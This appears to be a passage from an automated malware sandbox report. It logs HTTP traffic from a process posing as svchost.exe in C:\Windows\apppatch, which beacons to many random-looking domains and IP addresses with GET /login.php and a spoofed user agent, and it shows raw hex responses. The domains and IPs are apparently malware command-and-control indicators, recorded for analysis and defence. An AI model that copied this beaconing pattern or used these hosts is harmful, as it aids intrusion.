                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.559969902 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.831363916 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:32 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          19192.168.2.849728106.15.232.16380001736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.412297964 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.187829971 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.462639093 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.730094910 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.560908079 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.829479933 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Nov 11, 2024 18:24:32.834279060 CET290OUTGET /dh/147287063_498544.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:24:33.137892008 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:33 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          20192.168.2.84973076.223.67.189801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.179394007 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qexyhuv.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.605503082 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          21192.168.2.84973164.225.91.73801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223375082 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.769535065 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          22192.168.2.84973244.221.84.105801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.343624115 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyciz.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.770819902 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          23192.168.2.849734103.224.182.252801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.469979048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.050568104 CET338INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1731345856.5179536; expires=Thu, 09-Nov-2034 17:24:16 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0424-16c6-a16f-217434b104d2
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          24192.168.2.849733103.224.212.210801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.471121073 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.039020061 CET340INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          set-cookie: __tad=1731345856.5241611; expires=Thu, 09-Nov-2034 17:24:16 GMT; Max-Age=315360000
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0424-16dd-8cfc-e770b1d90a79
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          25192.168.2.849735154.85.183.50801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.621033907 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.440803051 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.445523977 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.731031895 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:17 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.017805099 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.303112984 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.565736055 CET243OUTGET /login.php HTTP/1.1
